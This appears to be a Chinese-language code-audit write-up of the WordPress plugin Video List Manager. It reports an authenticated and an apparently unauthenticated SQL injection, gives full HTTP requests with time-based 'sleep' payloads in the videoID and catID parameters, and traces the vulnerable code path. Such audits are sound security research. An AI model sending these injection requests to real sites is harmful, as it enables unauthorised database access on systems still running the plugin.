【代码审计】WordPress 插件 Video List Manager

52881

Video List Manager 是 WordPress 的插件，由 Tung Pham 创建（电子邮件：tungpham.bh@gmail.com）。它可以帮助您的网站轻松显示具有灯箱效果的视频。特别是，您的所有视频都将适合所有主题。

通过审计发现其中存在的 SQL 注入问题

授权 SQL 注入

登录后台后，上传并加载启用插件。

任意添加一个下载链接

添加成功后构造数据包

GET /wp-admin/admin.php?page=tnt_video_edit_page&videoID=1+and+sleep(5) HTTP/1.1
Host: wordpress.test
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://wordpress.test/wp-admin/admin.php?page=tnt_video_manage_page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wordpress_b60eaabcb48d166363619b49c0311df0=admin%7C1690447954%7C8zxbl7s4ieaUcBjDCDDxYXY9lYOi3OYyJwAqHlWroCl%7Ccdf05c546479e4b4543bfb4403601bff3daa1854d9bc4bd0f96a9f16800c58d7; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_b60eaabcb48d166363619b49c0311df0=admin%7C1690447954%7C8zxbl7s4ieaUcBjDCDDxYXY9lYOi3OYyJwAqHlWroCl%7C5b7d5874f97fcf1b13dc594c1930074c8a3479de91f46e2ff2e163693c3672c3; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1690275155; PHPSESSID=cqn47joofvdd7pqr2e9vo66u5s; fbv_selected=1;XDEBUG_SESSION=PHPSTORM
Connection: close

发现成功使得服务器沉睡五秒

成功执行了sql 语句 sleep(5)

‍

wp-content/plugins/video-list-manager/includes/menus-view.php#tnt_video_edit

wp-content/plugins/video-list-manager/includes/models/video.php#TNT_Video::tntGetVideo

造的代码未经处理就直接拼接到sql 语句中

wp-includes/class-wpdb.php#wpdb::get_row

‍

未授权 SQL 注入

登录后台后，上传并加载启用插件。

任意添加一个分类

添加成功后构造数据包

POST /wp-admin/admin.php HTTP/1.1
Host: wordpress.test
Content-Length: 62
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://wordpress.test/wp-admin/admin.php?page=tnt_video_cat_edit_page&catID=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: XDEBUG_SESSION=PHPSTORM
Connection: close

catID=1+and+sleep(10)&catTitle=1&tntEditVideoCat=Edit+Category

发现成功使得服务器沉睡十秒

并不需要登陆权限就成功执行了sql 语句 sleep(10)

wp-admin/admin.php

wp-load.php

wp-config.php

wp-settings.php

wp-content/plugins/video-list-manager/video-list-manager.php

依次包含，最后可以未授权的访问到文件 wp-content/plugins/video-list-manager/includes/menus-process.php

wp-content/plugins/video-list-manager/includes/menus-process.php

wp-content/plugins/video-list-manager/includes/models/videocat.php#TNT_VideoCat::tntGetCat

wp-includes/class-wpdb.php#wpdb::get_row

‍